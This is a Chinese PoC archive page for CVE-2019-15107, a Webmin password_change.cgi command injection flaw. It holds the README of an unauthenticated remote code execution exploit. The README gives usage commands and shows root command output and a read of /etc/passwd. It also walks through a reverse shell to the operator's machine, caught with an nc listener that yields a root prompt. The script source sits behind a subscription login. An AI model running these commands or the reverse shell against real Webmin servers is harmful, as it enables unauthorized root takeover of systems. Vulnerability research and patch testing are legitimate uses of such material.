目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2019-15107 PoC — Webmin 命令操作系统命令注入漏洞

来源
https://github.com/NasrallahBaadi/CVE-2019-15107
关联漏洞
标题:Webmin 命令操作系统命令注入漏洞 (CVE-2019-15107)
Description:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令操作系统命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。
Description
CVE-2019-15107 Webmin unauthenticated RCE
介绍
# CVE-2019-15107 Webmin 1.890 Unauthenticated Remote Code Execution

This script is designed to exploit unauthenticated command execution vulnerability in Webmin 1.890. It allows you to execute arbitrary commands on a target Webmin server or to obtain a reverse shell.

## Usage

The exploit takes 5 arguments:

```bash
$ python3 test.py -h                       
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell

```

The only required option is `-i` which is the ip address of the target.

Running the exploit with only `-i` will execute the command `id` at a target located on port `10000`

```bash
$ python3 exploit.py -i 10.200.105.200 
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```

### Command execution

You can specify what command to run using the `-c` or `--command` options:

```bash
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]

```

### Reverse shell

You can also get a reverse shell by using the `--shell` option.

> You will be prompt to enter your IP address and the listening port:

```bash
$ python3 exploit.py -i 10.200.105.200 --shell 
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
```

```bash
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]# 
```

### Proxy

By adding `-x` or `--proxy` option you can send the request though burp proxy at 127.0.0.1:8080

## References

<https://nvd.nist.gov/vuln/detail/cve-2019-15107>
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →